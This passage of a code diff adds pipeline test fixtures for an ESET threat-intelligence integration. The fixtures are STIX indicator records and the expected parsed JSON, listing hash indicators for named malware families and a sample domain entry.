@@ -0,0 +1,70 @@ +{ + "@timestamp": "2023-10-19T02:00:28.000Z", + "agent": { + "ephemeral_id": "6f2d8296-ddcf-4634-867b-00b524eb387c", + "id": "9e0f3400-1e85-4042-80cf-3bb8e2ffb404", + "name": "docker-fleet-agent", + "type": "filebeat", + "version": "8.12.1" + }, + "data_stream": { + "dataset": "ti_eset.domains", + "namespace": "ep", + "type": "logs" + }, + "ecs": { + "version": "8.11.0" + }, + "elastic_agent": { + "id": "9e0f3400-1e85-4042-80cf-3bb8e2ffb404", + "snapshot": false, + "version": "8.12.1" + }, + "eset": { + "id": "indicator--dfb05726-f2be-43c8-a5b2-48e78cc05286", + "labels": [ + "malicious-activity" + ], + "valid_until": "2023-10-21T02:00:28.000Z" + }, + "event": { + "agent_id_status": "verified", + "category": [ + "threat" + ], + "created": "2024-03-27T14:20:11.664Z", + "dataset": "ti_eset.domains", + "ingested": "2024-03-27T14:20:23Z", + "kind": "enrichment", + "original": "{\"created\":\"2023-10-19T02:00:28.000Z\",\"description\":\"Host is known to be actively distributing adware or other medium-risk software.\",\"id\":\"indicator--dfb05726-f2be-43c8-a5b2-48e78cc05286\",\"labels\":[\"malicious-activity\"],\"modified\":\"2023-10-19T02:00:28.000Z\",\"name\":\"example.com\",\"pattern\":\"[domain-name:value='example.com']\",\"pattern_type\":\"stix\",\"pattern_version\":\"2.1\",\"spec_version\":\"indicator\",\"type\":\"indicator\",\"valid_from\":\"2023-10-19T02:00:28Z\",\"valid_until\":\"2023-10-21T02:00:28Z\"}", + "type": [ + "indicator" + ] + }, + "input": { + "type": "httpjson" + }, + "tags": [ + "preserve_original_event", + "forwarded", + "eset-domains" + ], + "threat": { + "feed": { + "name": "ESET Domain stix 2.1" + }, + "indicator": { + "confidence": "High", + "description": "Host is known to be actively distributing adware or other medium-risk software.", + "last_seen": "2023-10-19T02:00:28.000Z", + "modified_at": "2023-10-19T02:00:28.000Z", + "name": "example.com", + "provider": "eset", + "type": "url", + "url": { + "domain": "example.com", + 
"original": "example.com" + } + } + } +} \ No newline at end of file diff --git a/packages/ti_eset/data_stream/files/_dev/test/pipeline/test-common-config.yml b/packages/ti_eset/data_stream/files/_dev/test/pipeline/test-common-config.yml new file mode 100644 index 00000000000..4da22641654 --- /dev/null +++ b/packages/ti_eset/data_stream/files/_dev/test/pipeline/test-common-config.yml @@ -0,0 +1,3 @@ +fields: + tags: + - preserve_original_event diff --git a/packages/ti_eset/data_stream/files/_dev/test/pipeline/test-eset-ndjson.log b/packages/ti_eset/data_stream/files/_dev/test/pipeline/test-eset-ndjson.log new file mode 100644 index 00000000000..24eed79d731 --- /dev/null +++ b/packages/ti_eset/data_stream/files/_dev/test/pipeline/test-eset-ndjson.log 
@@ -0,0 +1,11 @@ +{"created":"2023-11-15T05:00:09.6Z","description":"Each of these file hashes indicates that a variant of a variant of Win32/Injector.ETLW trojan is present.","id":"indicator--70b84911-a3e0-4c20-a0d3-e5df95d03fbc","labels":["malicious-activity"],"modified":"2023-11-15T05:00:09.642619Z","name":"b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7","pattern":"[file:hashes.'SHA-256'='13a659b3fdd04c558b4758653bec387d96ff0414dee74a873735f5ec31f915ea'] OR [file:hashes.'SHA-1'='7bf71d325e777c7a8ac6a29486a26f208bde2c6e'] OR [file:hashes.'MD5'='7c60dda0a4dda9abf2956cc35c8482e2']","pattern_type":"stix","pattern_version":"2.1","spec_version":"indicator","type":"indicator","valid_from":"2023-11-15T05:00:09.642619Z","valid_until":"2023-11-17T05:00:09.642619Z"} +{"id": "indicator--dafe4edd-2e79-4c62-8512-c39e6c1e2bcb", "type": "indicator", "spec_version": "indicator", "created": "2023-10-15T01:59:23.000Z", "modified": "2023-10-15T01:59:23.000Z", "name": "b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7", "description": "Each of these file hashes indicates that a variant of a variant of Win32/AutoRun.Agent.UD worm is present.", "pattern": "[file:hashes.'SHA-256'='009628403d1f5ea6d5e0c47e0b6481013c2b6ea7caf65e599904f3212b2611a5'] OR [file:hashes.'SHA-1'='0721deb7d7afb22a38be8c68db4d9bebc1d075b8'] OR [file:hashes.'MD5'='1a57c6496aef72a6996d412db68992e7']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2023-10-15T01:59:23Z", "valid_until": "2023-10-17T01:59:23Z", "labels": ["malicious-activity"]} +{"id": "indicator--8be4c888-fbdd-4869-9d9c-e542a5d8399d", "type": "indicator", "spec_version": "indicator", "created": "2023-10-15T01:59:23.000Z", "modified": "2023-10-15T01:59:23.000Z", "name": "b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7", "description": "Each of these file hashes indicates that a variant of a variant of Win32/TrojanDropper.Agent.PQT trojan is present.", "pattern": 
"[file:hashes.'SHA-256'='1058ee33ef745284039b31ac92c3a73e7eed4f8e6bd29e0d64a7ebdfd2231321'] OR [file:hashes.'SHA-1'='08af85f31499678205bf70280fafc421ea16c9e2'] OR [file:hashes.'MD5'='c31852836acbbec2101824999b482de3']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2023-10-15T01:59:23Z", "valid_until": "2023-10-17T01:59:23Z", "labels": ["malicious-activity"]} +{"id": "indicator--3e578440-30e0-4b0f-ad66-53a282f7738f", "type": "indicator", "spec_version": "indicator", "created": "2023-10-15T01:59:23.000Z", "modified": "2023-10-15T01:59:23.000Z", "name": "b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7", "description": "Each of these file hashes indicates that a variant of VBS/Agent.QMG trojan is present.", "pattern": "[file:hashes.'SHA-256'='73c6acbf14cd7e70dd16a6a50baae785bf9cdc8c2a789be2cf16835c746dc9ce'] OR [file:hashes.'SHA-1'='0e75962a268970913d37598d526dc8470a5a7b66'] OR [file:hashes.'MD5'='dbb31d7036f2619928a1268a7ccc6a80']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2023-10-15T01:59:23Z", "valid_until": "2023-10-17T01:59:23Z", "labels": ["malicious-activity"]} +{"id": "indicator--ca3219e3-9e83-4236-b96e-a97c1878ea4f", "type": "indicator", "spec_version": "indicator", "created": "2023-10-15T01:59:23.000Z", "modified": "2023-10-15T01:59:23.000Z", "name": "b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7", "description": "Each of these file hashes indicates that a variant of HTML/Fraud.CX trojan is present.", "pattern": "[file:hashes.'SHA-256'='2bb279b89bef3adbef32fac40a50f3d7d26e1afb24ff1d803b186af9a4bb5425'] OR [file:hashes.'SHA-1'='237b4cd335ff7350e3df23ff42b2e1a2607d463d'] OR [file:hashes.'MD5'='99a95a2f3a5dffe722b1c7e5088337b6']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2023-10-15T01:59:23Z", "valid_until": "2023-10-17T01:59:23Z", "labels": ["malicious-activity"]} +{"id": "indicator--e49799ce-208c-4fab-967d-3eb2c3e71b1b", "type": "indicator", "spec_version": 
"indicator", "created": "2023-10-15T01:59:23.000Z", "modified": "2023-10-15T01:59:23.000Z", "name": "b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7", "description": "Each of these file hashes indicates that a variant of a variant of Win32/GenKryptik.GOVN trojan is present.", "pattern": "[file:hashes.'SHA-256'='c84aa7aad50629e8292a023270928903eb002b0673d854354df38ed8a85ae029'] OR [file:hashes.'SHA-1'='35813c9a4e49b3d9dd1740c0b6dc4dde1f97c8dd'] OR [file:hashes.'MD5'='d7244c4828f5189d018108741b0e5ae4']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2023-10-15T01:59:23Z", "valid_until": "2023-10-17T01:59:23Z", "labels": ["malicious-activity"]} +{"id": "indicator--9babb86e-0e2f-442c-9b37-5cd05198f58f", "type": "indicator", "spec_version": "indicator", "created": "2023-10-15T01:59:23.000Z", "modified": "2023-10-15T01:59:23.000Z", "name": "b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7", "description": "Each of these file hashes indicates that a variant of NSIS/Injector.ASH trojan is present.", "pattern": "[file:hashes.'SHA-256'='1a3fcc316f4b8b404415a1e22f414431144fe6798374cc860a40eddceae9c31d'] OR [file:hashes.'SHA-1'='489bd8f3ea436f212ad8894041e458737894c830'] OR [file:hashes.'MD5'='35a8d09f90bf40a9efc1c374411bec49']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2023-10-15T01:59:23Z", "valid_until": "2023-10-17T01:59:23Z", "labels": ["malicious-activity"]} +{"id": "indicator--1fb40180-521f-470f-95bb-b449282bd636", "type": "indicator", "spec_version": "indicator", "created": "2023-10-15T01:59:23.000Z", "modified": "2023-10-15T01:59:23.000Z", "name": "b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7", "description": "Each of these file hashes indicates that a variant of JS/Kryptik.BMZ trojan is present.", "pattern": "[file:hashes.'SHA-256'='b3a0353cdc10e06931a302c9a04ed58cc37b13c438ab7de1b37ea650b63e874b'] OR [file:hashes.'SHA-1'='6a42a72596ff639912e6f130926b9fe7d3d95647'] OR 
[file:hashes.'MD5'='2554bb1d8059a68cf7a42e5fec72a0de']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2023-10-15T01:59:23Z", "valid_until": "2023-10-17T01:59:23Z", "labels": ["malicious-activity"]} +{"id": "indicator--78b8e233-0cab-4d54-8474-7af5f271b96c", "type": "indicator", "spec_version": "indicator", "created": "2023-10-15T01:59:23.000Z", "modified": "2023-10-15T01:59:23.000Z", "name": "b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7", "description": "Each of these file hashes indicates that a variant of JS/ScrInject.B trojan is present.", "pattern": "[file:hashes.'SHA-256'='f772194ec4bc9baf384bbee2e483e09ba2f4b9d3b2fbba2978b667c0447bb4c2'] OR [file:hashes.'SHA-1'='74dc6715edd2fcfd12f28359f3efca038e9300ac'] OR [file:hashes.'MD5'='46f845c419d4ed6c899bde1b3a16c344']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2023-10-15T01:59:23Z", "valid_until": "2023-10-17T01:59:23Z", "labels": ["malicious-activity"]} +{"id": "indicator--abab1f5a-69bb-4703-baaf-1579f0717d5a", "type": "indicator", "spec_version": "indicator", "created": "2023-10-15T01:59:23.000Z", "modified": "2023-10-15T01:59:23.000Z", "name": "b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7", "description": "Each of these file hashes indicates that a variant of HTML/Refresh.AUD trojan is present.", "pattern": "[file:hashes.'SHA-256'='a3ac8a9425b52564fddf4309d2ae597a48b70df5deed2b08bd1cf92bdbe6aba3'] OR [file:hashes.'SHA-1'='8a4489c702681aab936aa931b6df312c2720c119'] OR [file:hashes.'MD5'='9bd51aabb0b341a7d072794394e09f86']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2023-10-15T01:59:23Z", "valid_until": "2023-10-17T01:59:23Z", "labels": ["malicious-activity"]} +{"id": "indicator--9baf483f-9dd8-464b-ab81-22e729547c59", "type": "indicator", "spec_version": "indicator", "created": "2023-10-15T01:59:23.000Z", "modified": "2023-10-15T01:59:23.000Z", "name": 
"b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7", "description": "Each of these file hashes indicates that a variant of HTML/Phishing.Agent.AUW trojan is present.", "pattern": "[file:hashes.'SHA-256'='c75b7ec26ef3d6ce1578e0c80ecf124285c0714da0023813bc45f6141f4c5fb5'] OR [file:hashes.'SHA-1'='aacb3c991ce8b1fcc92b353fb82a71cb45487e5e'] OR [file:hashes.'MD5'='73631f9ce0efc3e9ac1d296fcc5af3aa']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2023-10-15T01:59:23Z", "valid_until": "2023-10-17T01:59:23Z", "labels": ["malicious-activity"]} \ No newline at end of file diff --git a/packages/ti_eset/data_stream/files/_dev/test/pipeline/test-eset-ndjson.log-expected.json b/packages/ti_eset/data_stream/files/_dev/test/pipeline/test-eset-ndjson.log-expected.json new file mode 100644 index 00000000000..cd7dbd3bcbc --- /dev/null +++ b/packages/ti_eset/data_stream/files/_dev/test/pipeline/test-eset-ndjson.log-expected.json 
@@ -0,0 +1,521 @@ +{ + "expected": [ + { + "@timestamp": "2023-11-15T05:00:09.600Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--70b84911-a3e0-4c20-a0d3-e5df95d03fbc", + "labels": [ + "malicious-activity" + ], + "valid_until": "2023-11-17T05:00:09.642Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"created\":\"2023-11-15T05:00:09.6Z\",\"description\":\"Each of these file hashes indicates that a variant of a variant of Win32/Injector.ETLW trojan is present.\",\"id\":\"indicator--70b84911-a3e0-4c20-a0d3-e5df95d03fbc\",\"labels\":[\"malicious-activity\"],\"modified\":\"2023-11-15T05:00:09.642619Z\",\"name\":\"b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7\",\"pattern\":\"[file:hashes.'SHA-256'='13a659b3fdd04c558b4758653bec387d96ff0414dee74a873735f5ec31f915ea'] OR [file:hashes.'SHA-1'='7bf71d325e777c7a8ac6a29486a26f208bde2c6e'] OR [file:hashes.'MD5'='7c60dda0a4dda9abf2956cc35c8482e2']\",\"pattern_type\":\"stix\",\"pattern_version\":\"2.1\",\"spec_version\":\"indicator\",\"type\":\"indicator\",\"valid_from\":\"2023-11-15T05:00:09.642619Z\",\"valid_until\":\"2023-11-17T05:00:09.642619Z\"}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET Malicious Files stix 2.1" + }, + "indicator": { + "confidence": "High", + "description": "Each of these file hashes indicates that a variant of a variant of Win32/Injector.ETLW trojan is present.", + "file": { + "hash": { + "md5": "7c60dda0a4dda9abf2956cc35c8482e2", + "sha1": "7bf71d325e777c7a8ac6a29486a26f208bde2c6e", + "sha256": "13a659b3fdd04c558b4758653bec387d96ff0414dee74a873735f5ec31f915ea" + } + }, + "last_seen": "2023-11-15T05:00:09.642Z", + "modified_at": "2023-11-15T05:00:09.642Z", + "name": "b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7", + "provider": "eset", + "type": "file" + } + } + }, + { + "@timestamp": "2023-10-15T01:59:23.000Z", + "ecs": { 
+ "version": "8.11.0" + }, + "eset": { + "id": "indicator--dafe4edd-2e79-4c62-8512-c39e6c1e2bcb", + "labels": [ + "malicious-activity" + ], + "valid_until": "2023-10-17T01:59:23.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"id\": \"indicator--dafe4edd-2e79-4c62-8512-c39e6c1e2bcb\", \"type\": \"indicator\", \"spec_version\": \"indicator\", \"created\": \"2023-10-15T01:59:23.000Z\", \"modified\": \"2023-10-15T01:59:23.000Z\", \"name\": \"b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7\", \"description\": \"Each of these file hashes indicates that a variant of a variant of Win32/AutoRun.Agent.UD worm is present.\", \"pattern\": \"[file:hashes.'SHA-256'='009628403d1f5ea6d5e0c47e0b6481013c2b6ea7caf65e599904f3212b2611a5'] OR [file:hashes.'SHA-1'='0721deb7d7afb22a38be8c68db4d9bebc1d075b8'] OR [file:hashes.'MD5'='1a57c6496aef72a6996d412db68992e7']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"valid_from\": \"2023-10-15T01:59:23Z\", \"valid_until\": \"2023-10-17T01:59:23Z\", \"labels\": [\"malicious-activity\"]}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET Malicious Files stix 2.1" + }, + "indicator": { + "confidence": "High", + "description": "Each of these file hashes indicates that a variant of a variant of Win32/AutoRun.Agent.UD worm is present.", + "file": { + "hash": { + "md5": "1a57c6496aef72a6996d412db68992e7", + "sha1": "0721deb7d7afb22a38be8c68db4d9bebc1d075b8", + "sha256": "009628403d1f5ea6d5e0c47e0b6481013c2b6ea7caf65e599904f3212b2611a5" + } + }, + "last_seen": "2023-10-15T01:59:23.000Z", + "modified_at": "2023-10-15T01:59:23.000Z", + "name": "b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7", + "provider": "eset", + "type": "file" + } + } + }, + { + "@timestamp": "2023-10-15T01:59:23.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": 
"indicator--8be4c888-fbdd-4869-9d9c-e542a5d8399d", + "labels": [ + "malicious-activity" + ], + "valid_until": "2023-10-17T01:59:23.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"id\": \"indicator--8be4c888-fbdd-4869-9d9c-e542a5d8399d\", \"type\": \"indicator\", \"spec_version\": \"indicator\", \"created\": \"2023-10-15T01:59:23.000Z\", \"modified\": \"2023-10-15T01:59:23.000Z\", \"name\": \"b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7\", \"description\": \"Each of these file hashes indicates that a variant of a variant of Win32/TrojanDropper.Agent.PQT trojan is present.\", \"pattern\": \"[file:hashes.'SHA-256'='1058ee33ef745284039b31ac92c3a73e7eed4f8e6bd29e0d64a7ebdfd2231321'] OR [file:hashes.'SHA-1'='08af85f31499678205bf70280fafc421ea16c9e2'] OR [file:hashes.'MD5'='c31852836acbbec2101824999b482de3']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"valid_from\": \"2023-10-15T01:59:23Z\", \"valid_until\": \"2023-10-17T01:59:23Z\", \"labels\": [\"malicious-activity\"]}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET Malicious Files stix 2.1" + }, + "indicator": { + "confidence": "High", + "description": "Each of these file hashes indicates that a variant of a variant of Win32/TrojanDropper.Agent.PQT trojan is present.", + "file": { + "hash": { + "md5": "c31852836acbbec2101824999b482de3", + "sha1": "08af85f31499678205bf70280fafc421ea16c9e2", + "sha256": "1058ee33ef745284039b31ac92c3a73e7eed4f8e6bd29e0d64a7ebdfd2231321" + } + }, + "last_seen": "2023-10-15T01:59:23.000Z", + "modified_at": "2023-10-15T01:59:23.000Z", + "name": "b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7", + "provider": "eset", + "type": "file" + } + } + }, + { + "@timestamp": "2023-10-15T01:59:23.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--3e578440-30e0-4b0f-ad66-53a282f7738f", + "labels": [ 
+ "malicious-activity" + ], + "valid_until": "2023-10-17T01:59:23.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"id\": \"indicator--3e578440-30e0-4b0f-ad66-53a282f7738f\", \"type\": \"indicator\", \"spec_version\": \"indicator\", \"created\": \"2023-10-15T01:59:23.000Z\", \"modified\": \"2023-10-15T01:59:23.000Z\", \"name\": \"b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7\", \"description\": \"Each of these file hashes indicates that a variant of VBS/Agent.QMG trojan is present.\", \"pattern\": \"[file:hashes.'SHA-256'='73c6acbf14cd7e70dd16a6a50baae785bf9cdc8c2a789be2cf16835c746dc9ce'] OR [file:hashes.'SHA-1'='0e75962a268970913d37598d526dc8470a5a7b66'] OR [file:hashes.'MD5'='dbb31d7036f2619928a1268a7ccc6a80']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"valid_from\": \"2023-10-15T01:59:23Z\", \"valid_until\": \"2023-10-17T01:59:23Z\", \"labels\": [\"malicious-activity\"]}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET Malicious Files stix 2.1" + }, + "indicator": { + "confidence": "High", + "description": "Each of these file hashes indicates that a variant of VBS/Agent.QMG trojan is present.", + "file": { + "hash": { + "md5": "dbb31d7036f2619928a1268a7ccc6a80", + "sha1": "0e75962a268970913d37598d526dc8470a5a7b66", + "sha256": "73c6acbf14cd7e70dd16a6a50baae785bf9cdc8c2a789be2cf16835c746dc9ce" + } + }, + "last_seen": "2023-10-15T01:59:23.000Z", + "modified_at": "2023-10-15T01:59:23.000Z", + "name": "b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7", + "provider": "eset", + "type": "file" + } + } + }, + { + "@timestamp": "2023-10-15T01:59:23.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--ca3219e3-9e83-4236-b96e-a97c1878ea4f", + "labels": [ + "malicious-activity" + ], + "valid_until": "2023-10-17T01:59:23.000Z" + }, + "event": { + "category": [ + "threat" + ], + 
"kind": "enrichment", + "original": "{\"id\": \"indicator--ca3219e3-9e83-4236-b96e-a97c1878ea4f\", \"type\": \"indicator\", \"spec_version\": \"indicator\", \"created\": \"2023-10-15T01:59:23.000Z\", \"modified\": \"2023-10-15T01:59:23.000Z\", \"name\": \"b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7\", \"description\": \"Each of these file hashes indicates that a variant of HTML/Fraud.CX trojan is present.\", \"pattern\": \"[file:hashes.'SHA-256'='2bb279b89bef3adbef32fac40a50f3d7d26e1afb24ff1d803b186af9a4bb5425'] OR [file:hashes.'SHA-1'='237b4cd335ff7350e3df23ff42b2e1a2607d463d'] OR [file:hashes.'MD5'='99a95a2f3a5dffe722b1c7e5088337b6']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"valid_from\": \"2023-10-15T01:59:23Z\", \"valid_until\": \"2023-10-17T01:59:23Z\", \"labels\": [\"malicious-activity\"]}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET Malicious Files stix 2.1" + }, + "indicator": { + "confidence": "High", + "description": "Each of these file hashes indicates that a variant of HTML/Fraud.CX trojan is present.", + "file": { + "hash": { + "md5": "99a95a2f3a5dffe722b1c7e5088337b6", + "sha1": "237b4cd335ff7350e3df23ff42b2e1a2607d463d", + "sha256": "2bb279b89bef3adbef32fac40a50f3d7d26e1afb24ff1d803b186af9a4bb5425" + } + }, + "last_seen": "2023-10-15T01:59:23.000Z", + "modified_at": "2023-10-15T01:59:23.000Z", + "name": "b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7", + "provider": "eset", + "type": "file" + } + } + }, + { + "@timestamp": "2023-10-15T01:59:23.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--e49799ce-208c-4fab-967d-3eb2c3e71b1b", + "labels": [ + "malicious-activity" + ], + "valid_until": "2023-10-17T01:59:23.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"id\": \"indicator--e49799ce-208c-4fab-967d-3eb2c3e71b1b\", \"type\": \"indicator\", 
\"spec_version\": \"indicator\", \"created\": \"2023-10-15T01:59:23.000Z\", \"modified\": \"2023-10-15T01:59:23.000Z\", \"name\": \"b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7\", \"description\": \"Each of these file hashes indicates that a variant of a variant of Win32/GenKryptik.GOVN trojan is present.\", \"pattern\": \"[file:hashes.'SHA-256'='c84aa7aad50629e8292a023270928903eb002b0673d854354df38ed8a85ae029'] OR [file:hashes.'SHA-1'='35813c9a4e49b3d9dd1740c0b6dc4dde1f97c8dd'] OR [file:hashes.'MD5'='d7244c4828f5189d018108741b0e5ae4']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"valid_from\": \"2023-10-15T01:59:23Z\", \"valid_until\": \"2023-10-17T01:59:23Z\", \"labels\": [\"malicious-activity\"]}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET Malicious Files stix 2.1" + }, + "indicator": { + "confidence": "High", + "description": "Each of these file hashes indicates that a variant of a variant of Win32/GenKryptik.GOVN trojan is present.", + "file": { + "hash": { + "md5": "d7244c4828f5189d018108741b0e5ae4", + "sha1": "35813c9a4e49b3d9dd1740c0b6dc4dde1f97c8dd", + "sha256": "c84aa7aad50629e8292a023270928903eb002b0673d854354df38ed8a85ae029" + } + }, + "last_seen": "2023-10-15T01:59:23.000Z", + "modified_at": "2023-10-15T01:59:23.000Z", + "name": "b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7", + "provider": "eset", + "type": "file" + } + } + }, + { + "@timestamp": "2023-10-15T01:59:23.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--9babb86e-0e2f-442c-9b37-5cd05198f58f", + "labels": [ + "malicious-activity" + ], + "valid_until": "2023-10-17T01:59:23.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"id\": \"indicator--9babb86e-0e2f-442c-9b37-5cd05198f58f\", \"type\": \"indicator\", \"spec_version\": \"indicator\", \"created\": \"2023-10-15T01:59:23.000Z\", 
\"modified\": \"2023-10-15T01:59:23.000Z\", \"name\": \"b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7\", \"description\": \"Each of these file hashes indicates that a variant of NSIS/Injector.ASH trojan is present.\", \"pattern\": \"[file:hashes.'SHA-256'='1a3fcc316f4b8b404415a1e22f414431144fe6798374cc860a40eddceae9c31d'] OR [file:hashes.'SHA-1'='489bd8f3ea436f212ad8894041e458737894c830'] OR [file:hashes.'MD5'='35a8d09f90bf40a9efc1c374411bec49']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"valid_from\": \"2023-10-15T01:59:23Z\", \"valid_until\": \"2023-10-17T01:59:23Z\", \"labels\": [\"malicious-activity\"]}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET Malicious Files stix 2.1" + }, + "indicator": { + "confidence": "High", + "description": "Each of these file hashes indicates that a variant of NSIS/Injector.ASH trojan is present.", + "file": { + "hash": { + "md5": "35a8d09f90bf40a9efc1c374411bec49", + "sha1": "489bd8f3ea436f212ad8894041e458737894c830", + "sha256": "1a3fcc316f4b8b404415a1e22f414431144fe6798374cc860a40eddceae9c31d" + } + }, + "last_seen": "2023-10-15T01:59:23.000Z", + "modified_at": "2023-10-15T01:59:23.000Z", + "name": "b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7", + "provider": "eset", + "type": "file" + } + } + }, + { + "@timestamp": "2023-10-15T01:59:23.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--1fb40180-521f-470f-95bb-b449282bd636", + "labels": [ + "malicious-activity" + ], + "valid_until": "2023-10-17T01:59:23.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"id\": \"indicator--1fb40180-521f-470f-95bb-b449282bd636\", \"type\": \"indicator\", \"spec_version\": \"indicator\", \"created\": \"2023-10-15T01:59:23.000Z\", \"modified\": \"2023-10-15T01:59:23.000Z\", \"name\": 
\"b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7\", \"description\": \"Each of these file hashes indicates that a variant of JS/Kryptik.BMZ trojan is present.\", \"pattern\": \"[file:hashes.'SHA-256'='b3a0353cdc10e06931a302c9a04ed58cc37b13c438ab7de1b37ea650b63e874b'] OR [file:hashes.'SHA-1'='6a42a72596ff639912e6f130926b9fe7d3d95647'] OR [file:hashes.'MD5'='2554bb1d8059a68cf7a42e5fec72a0de']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"valid_from\": \"2023-10-15T01:59:23Z\", \"valid_until\": \"2023-10-17T01:59:23Z\", \"labels\": [\"malicious-activity\"]}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET Malicious Files stix 2.1" + }, + "indicator": { + "confidence": "High", + "description": "Each of these file hashes indicates that a variant of JS/Kryptik.BMZ trojan is present.", + "file": { + "hash": { + "md5": "2554bb1d8059a68cf7a42e5fec72a0de", + "sha1": "6a42a72596ff639912e6f130926b9fe7d3d95647", + "sha256": "b3a0353cdc10e06931a302c9a04ed58cc37b13c438ab7de1b37ea650b63e874b" + } + }, + "last_seen": "2023-10-15T01:59:23.000Z", + "modified_at": "2023-10-15T01:59:23.000Z", + "name": "b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7", + "provider": "eset", + "type": "file" + } + } + }, + { + "@timestamp": "2023-10-15T01:59:23.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--78b8e233-0cab-4d54-8474-7af5f271b96c", + "labels": [ + "malicious-activity" + ], + "valid_until": "2023-10-17T01:59:23.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"id\": \"indicator--78b8e233-0cab-4d54-8474-7af5f271b96c\", \"type\": \"indicator\", \"spec_version\": \"indicator\", \"created\": \"2023-10-15T01:59:23.000Z\", \"modified\": \"2023-10-15T01:59:23.000Z\", \"name\": \"b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7\", \"description\": \"Each of these file hashes 
